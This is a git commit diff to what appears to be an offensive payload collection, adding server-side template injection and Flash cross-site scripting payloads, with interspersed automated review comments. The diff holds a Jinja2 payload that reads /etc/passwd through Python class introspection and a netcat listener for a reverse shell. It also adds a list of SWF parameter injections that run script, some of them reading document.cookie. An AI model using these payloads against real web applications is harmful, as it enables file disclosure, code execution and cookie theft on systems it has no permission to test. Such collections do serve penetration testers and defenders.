SSTI + XSS Flash

This commit is contained in:
Swissky 2017-07-16 16:30:08 +02:00
parent 77e2fc8226
commit 064467ecfc
3 changed files with 21 additions and 7 deletions


@ -6,6 +6,11 @@ Template injection allows an attacker to include template code into an existant
[Official website](http://jinja.pocoo.org/) [Official website](http://jinja.pocoo.org/)
> Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed.
Basic injection
```
{{4*4}}[[5*5]]
```
Jinja2 is used by Python Web Frameworks such as Django or Flask. Jinja2 is used by Python Web Frameworks such as Django or Flask.
The above injections have been tested on Flask application. The above injections have been tested on Flask application.
#### Template format #### Template format
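Review bot: the new "Basic injection" line is a plain heading while the rest of this file uses `####` headings (`#### Template format`, `#### Read remote file`), so it should become `#### Basic injection` to keep the section structure consistent. The added probe `{{4*4}}[[5*5]]` also mixes the Jinja2 `{{ }}` delimiter with `[[ ]]`, which is not a Jinja2 default delimiter; a short note saying that the second half targets other engines (or that a reflected `16` versus a literal `[[5*5]]` is what identifies the engine) would stop readers from assuming both halves are Jinja2 syntax.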
@ -37,7 +42,7 @@ The above injections have been tested on Flask application.
#### Read remote file #### Read remote file
``` ```
# ''.__class__.__mro__[2].__subclasses__()[40] = File class # ''.__class__.__mro__[2].__subclasses__()[40] = File class
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
``` ```
#### Write into remote file #### Write into remote file
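Review bot: the comment `# ''.__class__.__mro__[2].__subclasses__()[40] = File class` presents `[40]` as a fixed index, but the position of a class in `__subclasses__()` depends on the interpreter version and on what the application has imported, so the text should state that this offset is illustrative rather than constant. Since the rendered hunk shows no visible difference between the old and new versions of these two lines, it would also help to say in the commit message what actually changed here (for example whitespace), otherwise the edit is invisible to reviewers.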
@ -46,7 +51,7 @@ The above injections have been tested on Flask application.
``` ```
#### Remote Code Execution via reverse shell #### Remote Code Execution via reverse shell
Listen for connexion Listen for connexion
``` ```
nv -lnvp 8000 nv -lnvp 8000
``` ```
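Review bot: `nv -lnvp 8000` is a typo; the listener command is `nc -lnvp 8000` (netcat), and as written the snippet fails with "command not found". The line above it should also read "Listen for connection" rather than "connexion".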


@ -73,11 +73,20 @@ With an additional URL
XSS in flash application XSS in flash application
``` ```
\%22})))}catch(e){alert(document.domain);}// flashmediaelement.swf?jsinitfunctio%gn=alert`1`
flashmediaelement.swf?jsinitfunctio%25gn=alert(1)
"]);}catch(e){}if(!self.a)self.a=!alert(document.domain);// ZeroClipboard.swf?id=\"))} catch(e) {alert(1);}//&width=1000&height=1000
swfupload.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert(1);//
"a")(({type:"ready"}));}catch(e){alert(1)}// swfupload.swf?buttonText=test<a href="javascript:confirm(1)"><img src="https://web.archive.org/web/20130730223443im_/http://appsec.ws/ExploitDB/cMon.jpg"/></a>&.swf
plupload.flash.swf?%#target%g=alert&uid%g=XSS&
moxieplayer.swf?url=https://github.com/phwd/poc/blob/master/vid.flv?raw=true
video-js.swf?readyFunction=alert(1)
player.swf?playerready=alert(document.cookie)
player.swf?tracecall=alert(document.cookie)
banner.swf?clickTAG=javascript:alert(1);//
io.swf?yid=\"));}catch(e){alert(1);}//
video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29
bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
``` ```
XSS in Hidden input XSS in Hidden input
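Review bot: the new Flash payload list carries no attribution or version information, and two entries depend on third-party hosts that may disappear (the `web.archive.org` image URL in the `swfupload.swf?buttonText=` line and `https://github.com/phwd/poc/blob/master/vid.flv?raw=true` in the `moxieplayer.swf` line); each entry should cite the original advisory or write-up and the affected component version so a reader can verify the finding and know when it was fixed. The list also alternates between `alert(1)`, `alert(document.domain)` and `alert(document.cookie)` with no explanation; a one-line note that these are interchangeable proof-of-concept markers (with `document.domain` being the usual way to prove which origin the script runs in) would make the block easier to read, and the mitigation side deserves a sentence too: these are legacy SWF files that should simply be removed from web roots or served with `Content-Disposition: attachment` where a product still ships them.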